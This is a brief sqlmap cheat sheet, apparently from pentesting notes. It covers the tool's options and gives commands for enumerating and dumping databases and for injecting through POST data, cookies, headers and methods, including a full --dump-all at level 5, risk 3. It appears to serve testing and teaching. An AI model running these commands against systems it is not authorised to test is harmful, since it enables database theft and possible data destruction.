SQLmap
Operators
--batch -> Non interactive mode.
--dbms -> Type of db being use (Ex. mysql)
--threads -> Goes from 1 to 10.
Data
To retrieve everything:
--all --dump--dbs -> List all the databases.
To look at the
tablesof a specific database:
-D database --tablesRepeat the same process for
columns:
-D database -T table --columnsFor
dumpingthe data:
-D database -T table --dumpOr dump just one column:
-D database -T table -C column --dump--level
--levelThis option sets the level of tests, with values ranging from 1 to 5 (the default is level 1).
Level 1: Basic tests, only the most common and least intrusive SQL injection tests are performed.Level 2-4: These levels increase the range and types of tests performed, with more advanced and varied testing.Level 5: Perform the most comprehensive set of tests, including advanced and highly invasive tests. It increases the risk of being detected or causing issues on the target system.
--risk
--riskThis option sets the risk level of tests, with values ranging from 1 to 3 (the default is 1).
Risk 1: Basic, low-risk tests that are less likely to cause harm or be detected.Risk 2: Performs potentially more intrusive or advanced techniques.Risk 3: Attempt high-risk tests that could be more aggressive, such as testing for blind injections, time-based techniques, or dropping and modifying tables.
HTTP
HTTPWhen working with HTTP request is good practice to directly save the request in to a file and use the
-roption
sqlmap -r request.txt --level 5 --risk 3 --dump-all --batchUse
--force-sslwhen working withHTTPS.
sqlmap -r login.request --force-ssl --batchWhen working with
POSTrequests you need to use the option--data:
sqlmap -u "http://example.com" --data "username=*&password=*"For cookies:
sqlmap -u "http://example.com" --cookie "cookie=INJECTION"Headers
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"sqlmap -u "http://example.com" --headers="referer:*"Methods
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"Last updated